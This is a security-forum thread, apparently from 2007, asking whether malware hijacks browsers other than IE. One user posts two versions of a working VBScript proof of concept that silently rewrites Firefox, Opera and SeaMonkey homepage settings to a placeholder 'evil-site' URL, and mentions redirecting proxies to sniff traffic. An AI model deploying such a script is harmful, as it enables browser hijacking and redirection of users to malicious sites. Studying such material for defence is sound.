Is there any malware that affects browsers other than IE?

Hi,

Is there any malware in the wild that hijacks non IE browsers when executed? (I do not mean infected from visiting.)

My curiosity stems from security software features like reset defaults. They only apply to IE but not other browsers. I assumed this is because no spyware targets them, market share too low etc. Firefox has a javascript configuration file and Opera is a windows .ini file. It just feels a bit easy compared to modifying the registry.

Edit: Realised I posted to wrong place. Sorry! I meant Hijack section not general topics.

 

Hello,

Your question has several layers?

Is there malware that can affect other browsers?
Yes, once installed, in Windows, malware can control anything. A non-MS browser could be a target.

Is there malware that does this?
Very, very few.

Is there malware that propagates through other browsers or that can get you infected while you use other browsers?
Only a few poor proofs of concept, nothing real.

Answer: Don't use IE and 99% of your problems are solved.

Mrk

 

Thanks for replying.

I'm not asking if it is possible. I'm asking if there is are any wild examples. It just seems like the obvious next step and I'm suprized it isn't as prevalent.

• Malware manages to run on user's system through a P2P program, a worm, internet explorer
• The malware is already in, it hijacks internet explorer as its first target. It has nothing to lose by hijacking Firefox or Opera aswell.
• There are less products that will alert you if firefox or opera settings change? (I don't know of any)
• It has nothing to do with the browsers themselves, the security of Opera and Firefox is irrelevant. The attack is coming from the side rather than the front. Defending the door when the attack comes from the window.

 

This is completely wrong . Neither Firefox nor Opera are as safe as they are thought . Just because there are more threats which become more popular because they target the most popular web-browser does not mean that avoiding IE changes everything . Both Firefox and Opera have security issues, too and their problems are fixed just like those in IE because if not they will immediately become victims of threats .

Version 7 of Internet Explorer is much more secure than previous versions of itself and it is easily noticable for its users . Vista's IE7 is better than any other because of Protected Mode. Just notice people , since they upgraded there are much less complaints of browser hijack of IE (on the forums/newsgroups or real world)

In my views , all latest browser are equally secure when run on Windows NT/2000/2003/XP (e.g. MS Windows IE7 = Mozilla Firefox) . Vista makes IE7 the most secure on it because of User Account Control and Protected mode (you can learn more about them on the internet)

 

Hello,

Firefox and Opera have no issues. Show me one, ONE example. Real-life example. ONE.

It says Microsoft fan in your sig ...

Mrk

 

Hello, properly off topic!

I like some add-ons of FF like Adblock, Noscript to advoi Ads and Popup. Do you know any ones similar to them? I used IE7Pro, but it doesn't block popup.

Regards,

 

This was the answer I was expecting.

I do not mean while running Opera or Firefox. I'm wondering if there any real life wild malwares that hijack them from the outside. As I've mentioned, Opera uses an .ini file and firefox uses a .js file.

Which would require more permissions? Writing to the registry for IE or writing to an INI file or writing to that js file? Probably the registry, because both files are in Application Data per user profile.

As soon as malware code runs, you have already lost. Opera and Firefox can be the most securest browsers in the world. It doesn't matter if the spyware runs from elsewhere. They are not running so they cannot protect themselves.

EDIT: He may have Microsoft fan in his signature but you have Linux fanboyism in yours You also lose points for using the word 'pwn'...

 

Hello,

Linux and fanboyism do not go together well. More like, efficiency and enlightenment? Fanboy means endorsing something without rational justification. Endorsing Linux is simply logical, like drinking orange juice in hot summer or turning up air conditioning in your car in Florida. You would not call anyone doing that a fanboy?

While I do oppose the usage of l77t terminology in general terms, sometimes its usage is of great assistance when a significant message needs be delivered with minimal use of words. In this regard, the language of the impatient neo-nerds is of utmost use.

Hence, pwn delivers the punch far more efficiently than, let's say, obliterate or humiliate. And I do sincerely apologize for using efficient more than once in the post.

Cheers,
Mrk

 

It is easy to create eg a DLL injection for any browser, only HIPS can prevent it, not a browser, but IE is the logical choise, simply because it is in every Windows. It would be silly to create it eg for FF only, because it would affect only about 15% instead of 99%. So using other browsers, anything but IE, will improve your security for sure. In a real life, it does not matter, that FF2 has more vulnerabilities than IE7, it is about, who are the hackers pointed at and for now, it is IE.


Simply put, do as Mrkvonic said: Don't use IE and block it in your firewall, so it would not leak, if it would infected and silently launched by a malware.

 

Please , wasn't it IE7's Protected mode which could prevent hacker gain full access to files with the ANI exploit and prevent overwriting of such files ... Does any other browser have such things ... Enjoy
http://www.determina.com/security.research/flash/ani.swf

 

rather than possibilities, consider probabilities
a serious bit of malicious code slips into your box, its undetected
now why would the author want to notify the victim they are compromised by hijacking the browsers? They are more interested in making money, they might try to automatically harvest info from browser caches, then slave you to a bot net, drop a few back doors even a very slim chance of an actual first person looksee if your from an interesting IP block, but tipping their hand with an obvious hijack wouldnt be very likely at all.

if they have root they can do anything
(rape your dog, burn down your house, steal your car )
a lot of hijacking is about driving traffic to a portal for further and more serious exploitation
but if your already compromised to the extent you suggest, there is no need for that

while we are reviewing malicious motivation, the classic arguments of the Win\Nix debates
1. crafting malicious code for the greatest return on investment > Windows
(a secretive OS replete with an army of idiot users)
2. crafting malicious code for the OS you know > Linux
(a free OS readily available throughout the economically challenged nurseries of malware hotspots, but typically with a poor ROI when it comes to end users and generally needs a lazy admin to succeed, damage can be extensive however because of the prevalence of LAMP (a couple of popular compromised servers can then serve up alot of Windows exploits to unpatched idiots))

as far as browsers, the same motivational logic applies
and the browser is very often the leading vector for infection
history has not been kind when you combine the two
IE has historically been the biggest pain in the butt to Microsoft when it comes to security
what is important isnt the number of vulnerabilities, but rather the ones that lead to critical system access and how long till they are patched, critical system access through an alternative browser is rare (and is generally a system flaw also found in IE) but more importantly Firefox has kept patching ahead of the in the wild exploits far far better than IE

http://secunia.com/product/11/?task=statistics (IE 6)
http://secunia.com/product/12366/?task=statistics (IE 7)

http://secunia.com/product/4227/?task=statistics (FF 1.X)
http://secunia.com/product/12434/?task=statistics (FF 2.X)

(a simple comparison of how much red you see will do)

when its all said and done, the question isnt can an OS or browser be secured
(they cant all the time) but rather how large a window of serious vulnerability will the average idiot experience
(and if your running Linux your not average, though Im proof an idiot can do it )
however today Im on my W2K box w\ FF 2.0.0.4

Firefox on Linux was immune (as are the rest)
and Microsoft knew about the ANI bug in December

statement also assumes that the default DEP settings have been altered, precluding the average idiot
protected mode is effective, but only if its turned on. Intrusive security, is typically unused security.
I would point out its Microsoft that is dragging its heels to extend protected mode information to Mozilla not the other way round from what I can tell.

if you want to slam Firefox, at least use the right ammunition

http://secunia.com/advisories/25984/

 

Right I don't think anybody understood my question. That's okay, I wasn't very clear.

To clarify, when I say malware I actually mean: spyware, adware, crapware...Anything that tries to hijack you..

I'll answer it myself.

Yes. There is a script that can hijack your Opera and Firefox homepage webpage. I know this because I've just written it.

My visual basic script can be run from limited user mode. Visual Basic Scripts have less power than full blown applications.

Opera is an .ini file in the user directory and can be modified by anything that runs from the user. Firefox uses a javascript file.

• My firewall is Comodo Personal Firewall Pro (free version). It doesn't seem to notice anything.
• HijackThis doesn't see any changes.
• This could be used to leak information. Assuming I have set my firewall to allow Firefox or Opera to access information - it will -- through query strings in the URL.

This could be modified to change practically any value in about:config in firefox or opera:config in Opera. Proxy configuration is exposed by these configuration files. One who was serious about hijacking someone's machine or sniffing someone could configure a proxy for these browsers -- while in user mode.

This is my script.

Code:

'' change homepages of alternative browsers
'' written by vkidv, July 2007
'' tested under limited user in windows xp sp2

Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
Set WShell = CreateObject("WScript.Shell")
Const ForReading = 1, ForWriting = 2, ForAppending = 8, TRISTATE_FALSE = 0

DefaultHomepage = "http://evil-site/?creditcarddetails"

CloseIt = " is open and needs to be closed..."

Function isOpen(strProcess)
'' code following is from script center technet converted into function for conveniency
  strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& strProcess &"'")

  If colProcesses.Count = 0 Then
      isOpen = False
  Else
      isOpen = True
  End If
  
  Set objWMIService = Nothing
  Set colProcesses = Nothing
End Function

  If Not isOpen("firefox.exe") Then
    Firefox GetNewHomepageFor("Firefox")
  End If
  If Not isOpen("Opera.exe") Then
    Opera GetNewHomepageFor("Opera")
  End If


Function GetNewHomepageFor(strFor) 
  If WScript.Arguments.Count = 1 Then
    GetHomepage = WScript.Arguments(0)
  Else
    Specify = InputBox("WARNING: Current homepage for " & strFor & " will be overwritten with the following homepage. Cancel to stop.","New homepage for " & strFor, DefaultHomepage)
    If Specify <> vbEmpty Then
      GetNewHomepageFor = Specify
      DefaultHomepage = Specify
    Else Wscript.Quit(-1)
    End If
  End IF
End Function

Sub Opera(strURL)
'' changes opera homepage
  OperaDir = "%APPDATA%\Opera\Opera\profile\"
  OperaDir = WShell.ExpandEnvironmentStrings(OperaDir)
  
  If fso.FolderExists(OperaDir) Then
    WScript.Echo "Opera homepage changed to " & strURL
    WriteIni OperaDir&"opera6.ini","User Prefs","Home URL",strURL
  End If
End Sub

Sub Firefox(strURL)
  
  ProfileDir = "%APPDATA%\Mozilla\Firefox\"
  ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
  
  profile_count = 0
  
  Do Until iReturn = 2
    Profile = GetINI(ProfileDir & "profiles.ini","Profile" & profile_count,"Path", "", iReturn)
  If iReturn = 2 Then Exit Do
    
    Profile = Replace(Profile,"/","\")
    WScript.Echo "Firefox homepage for " & Profile & " changed to " & strURL
    Profile = ProfileDir & Profile
    Set FireConfig = fso.OpenTextFile(Profile & "\prefs.js", 8)
    FireConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
        
    profile_count = profile_count + 1
  Loop
End Sub

'' FOLLOWING CODE IS NOT AUTHORED BY ME
'' OBTAINED FROM http://mystuff.clarke.co.nz/MyStuff/vbsstuff.asp?func=CreateTempFile&Title=Generate%20a%20filename%20and%20path%20for%20a%20working%20file%20in%20the%20%25temp%25%20directory#CreateTempFile
'' very useful, thankyou

Function DeleteFile(strFiletoDelete)
    if fso.FileExists(strFiletoDelete) then
        set f=fso.GetFile(strFiletoDelete)
        f.attributes = 0 
        f.Delete True 
    end if
End Function

Function GetINI(str_FileName,str_SectionName,str_ItemName, sDefault, iReturn)
  'iReturn : 1 = File not found
  ' 2 = Section not found
  ' 3 = Item not found 
  Dim sTEMP, myFile, strFileName, strSectionName, strItemName
  iReturn=0 
  strFileName=str_FileName
  strSectionName=str_SectionName
  strItemName=str_ItemName
  GetINI = sDefault

  strFileName=Trim(strFileName)
  strSectionName=Trim(strSectionName)
  strItemName=Trim(strItemName)

  If Left(strSectionName,1) <> "[" Then
    strSectionName="[" + strSectionName
  End If 

  If Right(strSectionName,1) <> "]" Then
    strSectionName=strSectionName + "]"
  End If 

  If Not fso.fileexists(strFileName) Then
    iReturn = 1
    Exit Function
  End If 

  Set MyFile = fso.OpenTextFile(strFileName, ForReading)
  'Detect Empty File
  If myfile.AtEndOfStream Then
    MyFile.Close
    Exit Function 
  End If
  Do
    sTEMP = Trim(MyFile.ReadLine)
    If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
      sTEMP=""
    End If
  Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strSectionName)) = 1) 

  If myfile.AtEndOfStream Then
    iReturn = 2
    MyFile.Close
    Exit Function 
  End If 

  Do
    sTEMP = Trim(MyFile.ReadLine)
    If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
      sTEMP=""
    End If
    If InStr(UCase(sTEMP),"[") = 1 Then ' Start of next section
      iReturn = 3
      MyFile.Close
      Exit Function 
    End If
  Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strItemName)) = 1) 

  MyFile.Close

  If (InStr(UCase(sTEMP),UCase(strItemName)) <> 1) Then
    iReturn = 3
    Exit Function 
  End If 

  sTEMP=Trim(Right(sTEMP,Len(sTEMP) - (InStr(sTEMP,"="))))

  If InStr(sTEMP,";") <> 0 Then ' Check for "on the line" comments
    sTEMP=Trim(Left(sTEMP,InStr(sTEMP,";")-1))
  End If

  If sTEMP <> "" Then : GetINI=sTEMP
End Function 

Function GenerateTempFileName 
    Const TEMPORARY_FOLDER = 2
    Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
    Dim tfolder, tname
    Set tfolder = fso.GetSpecialFolder(TEMPORARY_FOLDER)
    tname = fso.GetTempName 
    GenerateTempFileName = tfolder & "\" & tname 
End Function 


Function WriteIni(strFileName, strSection, strItem, strValue)
  Dim bSectionExists, bInSection, bItemExists, bwrote, strPath, strline, strUcaseLine, iReturn, tfSourceINI, tfDestINI, strWorkingFile, aX, sLeftofEquals

  strWorkingFile=GenerateTempFileName
  DeleteFile(strWorkingFile) ' Delete the temporary file if it exists
  bInSection = False
  bSectionExists = False
  GetINI strFileName, strSection, strItem,"",iReturn
  if iReturn = 0 then
    bItemExists = TRUE
  else
    bItemExists = FALSE
  end if
  bwrote = False
  Err.Clear
  Set tfSourceINI = fso.OpenTextFile(strFileName, ForReading, True)
  Set tfDestINI = fso.OpenTextFile(strWorkingFile, ForWriting, True, TRISTATE_FALSE)
  If Err.Number <> 0 Then
    DeleteFile(strWorkingFile) 
    Set tfSourceINI = Nothing
    Set tfDestINI = Nothing
    WriteIni = False
    Exit Function
  End If
  While tfSourceINI.AtEndOfStream = False
    strline = Trim(tfSourceINI.ReadLine)
    strUcaseLine = UCase(strline)
    sLeftofEquals = strUcaseLine 
    if Len(strUcaseLine) > 1 then
      aX = Split(strUcaseLine,"=") ' Split up the string at the "=" 
      sLeftofEquals = Trim(aX(0)) ' Get the left most bit 
    end if
    If bwrote = False Then
      If strUcaseLine = UCase("[" & strSection & "]") Then
      bSectionExists = True
      bInSection = True
      ElseIf InStr(strline, "[") = 1 Then
        bInSection = False
      End If
    End If

    If bInSection Then 
      If bItemExists = False Then
        tfDestINI.WriteLine strline
        if len(strValue) => 1 then ' Don't write item out if Value is empty
          tfDestINI.WriteLine strItem & "=" & strValue
        end if 
        bwrote = True
        bInSection = False
      ElseIf sLeftofEquals = UCase(strItem) Then
        if len(strValue) => 1 then ' Don't write item out if Value is empty
          tfDestINI.WriteLine strItem & "=" & strValue
        end if 
        bwrote = True
        bInSection = False
      Else
        tfDestINI.WriteLine strline
      End If
    Else
      tfDestINI.WriteLine strline
    End If
  Wend
  If bSectionExists = False Then ' strSection doesn't exist
    tfDestINI.WriteLine
    tfDestINI.WriteLine "[" & strSection & "]"
    tfDestINI.WriteLine strItem & "=" & strValue
  End If

  tfSourceINI.Close
  tfDestINI.Close
  If Err.Number = 0 Then
    fso.DeleteFile strfilename
    fso.CopyFile strWorkingFile , strFilename
    DeleteFile(strWorkingFile)
    WriteIni = True
  Else
    DeleteFile(strWorkingFile)
    WriteIni = False
  End If
  Set tfSourceINI = Nothing
  Set tfDestINI = Nothing
End Function 

Instructions: Save as .vbs file, run with wscript by double clicking, or cscript filename [page to set to]
Run have installed firefox and/or Opera.
Please note

• The script attempts to change every Mozilla profile's homepage.
• Opera and/or firefox must be closed for the script to work. It will not try if they are open.
• Even if Mozilla firefox has a homepage set somewhere else in the configuation, this will override it because it is set afterward. Upon firefox close, firefox will save only the last set homepage will be in the file.

If you have VBS files blocked, that is not the point. Not many permissions seem to be required to make the pages that this script does.

If I've overlooked anything (I have a feeling I have) please tell me. I might be missing something obvious.

 

Thanks vkidv,

It certainly changed my Firefox homepage. When starting ff, I was presented with something about cannot find server evil-site. My homepage was about:blank prior to allowing the script to run.

I understand that you are not concerned about users allowing the script to run but how can this be used to hijack a browser otherwise? I think that I don't know enough.

Thanks

 

VB scripts run from the desktop aren't testing the browser. They're run by Windows Scripting Host, which is not governed by browser settings. On my setup, Script Sentry intercepts this script, allowing me to view it before deciding if I want it to run. I allowed WScript to execute it (intercepted by SSM), I just get an error message. "File or class name not found.."

This is more of a test of the user and of how well your defenses against script files are set up.

Vulnerabilities that allow changes to a system or a malicious install are found on occasion in alternate browsers on rare occasion and get fixed pretty quickly. IE6 has some actively exploited vulnerability waiting to be patched on more days than it doesn't. As far as IE7 is concerned, give it time. It will be compromised like all Microsoft browsers.

Do you expect any different at a security forum? Everybody has their favorite systems, apps, etc.

Rick

 

Instead of a non-existent test page, it would change it to a page that attempts to install to your system or attempts some other malicious activity. It's a way to get you to a site you wouldn't go to otherwise.
Rick

 

Being a fan of something/somebody means you like it/them . There is a reason , at least for me , to like the companies written in my signature -they are all the qualities of theirs and the people working there. What I tell/write is not written just because "I am their fan" . I am neither blind nor deaf , I can realise what is going on around me and if my favourites start going down I can change them but nothing can make me do it if they stay that way .

You all understand wrong the word "fan" and only speculate with it!!!
Is there anything wrong I have written in this thread?! I don't think so


Edit... and if you want to know , I do run only IE on my main system(s) but I use Firefox2 on my test computer because it is XP SP1 (not updated to SP2) , Firefox will "protect" better because it can be updated , IE6 SP1 is not updatable at all .

 

Both Opera and Mozilla do not use Browser Helper Objects or Active X common targets of malware code writers. Security issues or not, with an admin user account in Windows and heavy usage of IE, you're a HijackThis log just waiting to happen.

 

Hello, thank you for your responses.

My script isn't a test of the browsers defence while running. Instead, while they are not running, they are sitting ducks. I was curious why they are not currently targeted by spyware. My post title is: "Is there any malware that affects browsers other than IE?".

munckman, my stance is that if malware or spyware enters from some avenue such as P2P or Internet Explorer, it has nothing to lose by attaching itself to Firefox and Opera. This is because it is already won the battle - the battle to be executed by the machine.

I thought there was a reason why. I tried myself and there is no technical reason. I can only assume the reason why is that there is not much advantage in attaching to Opera or Firefox because they represent a small marketshare.

herbalist, you may have found a bug... Do you have Firefox and/or Opera installed? I may have made an assumption that wasn't obvious in my installation.

As for HijackThis. I want HijackThis and other browsers to display the settings of firefox, opera and other browsers. There might be no real wild malware but if it is as easy as hijacking Internet Explorer...

---
Off topic:

There is innocence in saying "Microsoft fan" like that of saying you like a certain tv show or book fan. Being a fan is expressing yourself. For example, "Harry Potter fan". This is because I read and enjoy Harry Potter.

My problem comes when fan becomes fanboyism. This occurred in this topic when someone entered singling an enemy fan camp out.
EDIT: The quote in question:

The elipsis represents what? Dismissal?
You do not single out an irrelevant detail to use as a weapon in argument. The fanboyism became apparent when usage of memes like 'pwn' and the questionable statement that Linux pwns Vista.


An example of fictional fanboyism: For example, Harry Potter pwns Lord of the Rings.

• Who cares if he is a Microsoft fan?
• Who cares if he is a Linux fan?
• I don't
• I care when the Linux fan uses the fact of being a Microsoft fan as a weapon. That is simply not right. Doing so is just asking for arguments.

Wow. This thread is amazing. I've managed to pull Opera, Firefox and Internet Explorer rivalry plus Windows and Linux. I apologise.

 

I think as you said if a piece of malware had entered and got executed on a PC, its battle was already won. The damage could be so much and deep into the system that targeting any browers at this point would not be much of a return of interest. A rootkit might be fully functional without the need to work through any browsers on an infected PC. Even simply changing the HOST file would be another venue to affect systemwide connections, etc.

 

Of course

I will now explicitly say that I mean:
adware
spyware
crapware
I mean malware but without all the viruses/trojans/worms that tend not to mess about with your browser settings.

I tend to lung them all into one term because they're all malicious. Sorry

 

I'm using Sea Monkey as my default browser, previously known as the Mozilla Suite. No Opera or FF installed. Never really liked the look or feel of FireFox. By any chance, were you assuming XP or another NT operating system? I was hoping it would work as I wanted to see if my SSM rules for wscript.exe would also block it.

HiTech Boy,
All I said is that it's expected for people at a place like this to have favorite apps, operating systems, etc, and to list them in a signature. I don't know what you read into that statement, but that's all I said.

Rick

 

I've used Mozilla in the past (before the rename) and preferred it to Firefox, too.

I'm installing it now...

Right. SeaMonkey uses different folder. That might explain your 'file not found' error herbalist! Thanks for your help. I have amended the script to change SeaMonkey's homepage too.

I am using Windows XP. If you are using Windows 98 as your avatar says, I have no idea whether it will work or not. Please let me know with the amended script!

If anybody gets any errors please say so!

NOTE This will change all of your profile's homepages...for good measure! This aggression would probably be utilized in real malware so I have intentionally not hardcoded it.

Code:

'' change homepages of alternative browsers
'' written by vkidv, July 2007
'' tested under limited user in windows xp sp2
'' version +1, amended 26 July 2007
'' firefox, opera and seamonkey

Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
Set WShell = CreateObject("WScript.Shell")
Const ForReading = 1, ForWriting = 2, ForAppending = 8, TRISTATE_FALSE = 0

DefaultHomepage = "http://evil-site/?creditcarddetails"
' this intentionally doesn't resolve to demonstrate

CloseIt = " is open and needs to be closed..."

Function isOpen(strProcess)
'' code following is from script center technet converted into function for conveniency
  strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& strProcess &"'")

  If colProcesses.Count = 0 Then
      isOpen = False
  Else
      isOpen = True
  End If
  
  Set objWMIService = Nothing
  Set colProcesses = Nothing
End Function

  If Not isOpen("firefox.exe") Then
    NewHomepage = GetNewHomepageFor("Firefox") 
    If NewHomepage <> False Then Firefox NewHomepage
  End If
  
  If Not isOpen("Opera.exe") Then
    NewHomepage = GetNewHomepageFor("Opera")
    If NewHomepage <> False Then Opera NewHomepage
  End If
  
  If Not isOpen("seamonkey.exe") Then
    NewHomepage = GetNewHomepageFor("SeaMonkey")
    If NewHomepage <> False Then SeaMonkey NewHomepage
  End If

Function GetNewHomepageFor(strFor) 
  If WScript.Arguments.Count = 1 Then
    GetNewHomepageFor = WScript.Arguments(0)
  Else
    Specify = InputBox("WARNING: Current homepage for " & strFor & " will be overwritten with the following homepage. Cancel to stop.","New homepage for " & strFor, DefaultHomepage)
    If Specify <> vbEmpty Then
      DefaultHomepage = Specify
      GetNewHomepageFor = Specify
    Else
      GetNewHomepageFor = False
    End If
  End IF
End Function

Sub Opera(strURL)
'' changes opera homepage
  OperaDir = "%APPDATA%\Opera\Opera\profile\"
  OperaDir = WShell.ExpandEnvironmentStrings(OperaDir)
  
  If fso.FolderExists(OperaDir) Then
    WScript.Echo "Opera homepage changed to " & strURL
    WriteIni OperaDir&"opera6.ini","User Prefs","Home URL",strURL
  End If
End Sub

Sub Firefox(strURL)
  
  ProfileDir = "%APPDATA%\Mozilla\Firefox\"
  ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
  
  profile_count = 0
  Completion = ""
  
  Do Until iReturn = 2
    Profile = GetINI(ProfileDir & "profiles.ini","Profile" & profile_count,"Path", "", iReturn)
  If iReturn = 2 Then Exit Do
    
    Profile = Replace(Profile,"/","\")
    Completion = Completion & "Firefox homepage for '" & Profile & "' changed to " & strURL
    Profile = ProfileDir & Profile
    Set FireConfig = fso.OpenTextFile(Profile & "\prefs.js", ForAppending)
    FireConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
        
    profile_count = profile_count + 1
  Loop
  
  If Len(Completion) > 0 Then WScript.Echo Completion
  Set Completion = Nothing
  
End Sub

Sub SeaMonkey(strURL)
  ProfileDir = "%APPDATA%\Mozilla\Profiles\"
  ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
  
  Set ProfileDir = fso.GetFolder(ProfileDir)
  
  Completion = ""
  For Each NamedProfile in ProfileDir.SubFolders
  ' the user-named profiles
    
    For Each Profile in NamedProfile.SubFolders
      If fso.FileExists(Profile.Path & "\prefs.js") Then
      Completion = Completion & "SeaMonkey homepage for profile named '" & NamedProfile.Name & "'' changed to " & strURL & vbNewLine
      SeaMonkeyProfile Profile.Path,strURL
       Exit For ' we found the profile file so we can stop
      End If
    Next
  Next
  
  If Len(Completion) > 0 Then WScript.Echo Completion
  Set Completion = Nothing

End Sub

Sub SeaMonkeyProfile(Profile,strURL)
  
  Set SeaConfig = fso.OpenTextFile(Profile & "\prefs.js", ForAppending)
    SeaConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
  Set SeaConfig = Nothing
  
End Sub

'' FOLLOWING CODE IS NOT AUTHORED BY ME
'' OBTAINED FROM http://mystuff.clarke.co.nz/MyStuff/vbsstuff.asp?func=CreateTempFile&Title=Generate%20a%20filename%20and%20path%20for%20a%20working%20file%20in%20the%20%25temp%25%20directory#CreateTempFile
'' very useful, thankyou

Function DeleteFile(strFiletoDelete)
    if fso.FileExists(strFiletoDelete) then
        set f=fso.GetFile(strFiletoDelete)
        f.attributes = 0 
        f.Delete True 
    end if
End Function

Function GetINI(str_FileName,str_SectionName,str_ItemName, sDefault, iReturn)
  'iReturn : 1 = File not found
  ' 2 = Section not found
  ' 3 = Item not found 
  Dim sTEMP, myFile, strFileName, strSectionName, strItemName
  iReturn=0 
  strFileName=str_FileName
  strSectionName=str_SectionName
  strItemName=str_ItemName
  GetINI = sDefault

  strFileName=Trim(strFileName)
  strSectionName=Trim(strSectionName)
  strItemName=Trim(strItemName)

  If Left(strSectionName,1) <> "[" Then
    strSectionName="[" + strSectionName
  End If 

  If Right(strSectionName,1) <> "]" Then
    strSectionName=strSectionName + "]"
  End If 

  If Not fso.fileexists(strFileName) Then
    iReturn = 1
    Exit Function
  End If 

  Set MyFile = fso.OpenTextFile(strFileName, ForReading)
  'Detect Empty File
  If myfile.AtEndOfStream Then
    MyFile.Close
    Exit Function 
  End If
  Do
    sTEMP = Trim(MyFile.ReadLine)
    If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
      sTEMP=""
    End If
  Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strSectionName)) = 1) 

  If myfile.AtEndOfStream Then
    iReturn = 2
    MyFile.Close
    Exit Function 
  End If 

  Do
    sTEMP = Trim(MyFile.ReadLine)
    If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
      sTEMP=""
    End If
    If InStr(UCase(sTEMP),"[") = 1 Then ' Start of next section
      iReturn = 3
      MyFile.Close
      Exit Function 
    End If
  Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strItemName)) = 1) 

  MyFile.Close

  If (InStr(UCase(sTEMP),UCase(strItemName)) <> 1) Then
    iReturn = 3
    Exit Function 
  End If 

  sTEMP=Trim(Right(sTEMP,Len(sTEMP) - (InStr(sTEMP,"="))))

  If InStr(sTEMP,";") <> 0 Then ' Check for "on the line" comments
    sTEMP=Trim(Left(sTEMP,InStr(sTEMP,";")-1))
  End If

  If sTEMP <> "" Then : GetINI=sTEMP
End Function 

Function GenerateTempFileName 
    Const TEMPORARY_FOLDER = 2
    Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
    Dim tfolder, tname
    Set tfolder = fso.GetSpecialFolder(TEMPORARY_FOLDER)
    tname = fso.GetTempName 
    GenerateTempFileName = tfolder & "\" & tname 
End Function 


Function WriteIni(strFileName, strSection, strItem, strValue)
  Dim bSectionExists, bInSection, bItemExists, bwrote, strPath, strline, strUcaseLine, iReturn, tfSourceINI, tfDestINI, strWorkingFile, aX, sLeftofEquals

  strWorkingFile=GenerateTempFileName
  DeleteFile(strWorkingFile) ' Delete the temporary file if it exists
  bInSection = False
  bSectionExists = False
  GetINI strFileName, strSection, strItem,"",iReturn
  if iReturn = 0 then
    bItemExists = TRUE
  else
    bItemExists = FALSE
  end if
  bwrote = False
  Err.Clear
  Set tfSourceINI = fso.OpenTextFile(strFileName, ForReading, True)
  Set tfDestINI = fso.OpenTextFile(strWorkingFile, ForWriting, True, TRISTATE_FALSE)
  If Err.Number <> 0 Then
    DeleteFile(strWorkingFile) 
    Set tfSourceINI = Nothing
    Set tfDestINI = Nothing
    WriteIni = False
    Exit Function
  End If
  While tfSourceINI.AtEndOfStream = False
    strline = Trim(tfSourceINI.ReadLine)
    strUcaseLine = UCase(strline)
    sLeftofEquals = strUcaseLine 
    if Len(strUcaseLine) > 1 then
      aX = Split(strUcaseLine,"=") ' Split up the string at the "=" 
      sLeftofEquals = Trim(aX(0)) ' Get the left most bit 
    end if
    If bwrote = False Then
      If strUcaseLine = UCase("[" & strSection & "]") Then
      bSectionExists = True
      bInSection = True
      ElseIf InStr(strline, "[") = 1 Then
        bInSection = False
      End If
    End If

    If bInSection Then 
      If bItemExists = False Then
        tfDestINI.WriteLine strline
        if len(strValue) => 1 then ' Don't write item out if Value is empty
          tfDestINI.WriteLine strItem & "=" & strValue
        end if 
        bwrote = True
        bInSection = False
      ElseIf sLeftofEquals = UCase(strItem) Then
        if len(strValue) => 1 then ' Don't write item out if Value is empty
          tfDestINI.WriteLine strItem & "=" & strValue
        end if 
        bwrote = True
        bInSection = False
      Else
        tfDestINI.WriteLine strline
      End If
    Else
      tfDestINI.WriteLine strline
    End If
  Wend
  If bSectionExists = False Then ' strSection doesn't exist
    tfDestINI.WriteLine
    tfDestINI.WriteLine "[" & strSection & "]"
    tfDestINI.WriteLine strItem & "=" & strValue
  End If

  tfSourceINI.Close
  tfDestINI.Close
  If Err.Number = 0 Then
    fso.DeleteFile strfilename
    fso.CopyFile strWorkingFile , strFilename
    DeleteFile(strWorkingFile)
    WriteIni = True
  Else
    DeleteFile(strWorkingFile)
    WriteIni = False
  End If
  Set tfSourceINI = Nothing
  Set tfDestINI = Nothing
End Function 

• Fixed the previous bug where command line does nothing.
• If you want to use command line use, save the file and use:
  cscript filename.vbs http://site-to-change-to/
• If you have your profile elsewhere then I'll have to parse and read registry.dat (in Application Data\Mozilla). I don't think I could do that with VBScript, but you can certainly do that with a real application.
• Press CANCEL for the application you do not have installed. Otherwise the script will error!

Please note:
I am not exposing any vulnerabilities. The only reason the homepage can be changed from user mode is because the user themselves must be able to do that. I'm just using something the application was designed to do. The problem is: I DO NOT HAVE PERMISSION TO DO IT. That is why this is a bad thing.

 

The script didn't work on mine.

Yes, I'm running 98. It does have several user profiles and uses a non-standard path to the application data folder. When I get time to load a more conventional test image, I'll give the script a try on it.
Rick

 

I get the same error message on my 98SE testbox with Sea Monkey 1.1.3. It's a single profile unit with everything in the usual places.
Rick

 

Line 19 refers to WMI. It appears as if Windows 98 doesn't have WMI installed by default.

http://www.microsoft.com/downloads/...ba-337b-4e92-8c18-a63847760ea5&DisplayLang=en

In some ways, not having WMI installed reduces the power of scripting and makes you safer. Platforms after 98 have WMI installed by default.

If you don't want to install the above, that is fine. I can remove "check if browser is running" so you never have to use WMI. I only use it to check if the browsers are running.

herbalist, if you press start, run and type in %appdata%

Do you go to the Application Data folder?

I looked it up and it doesn't appear to be set as an environment variable in 98. I may have to use a different variable.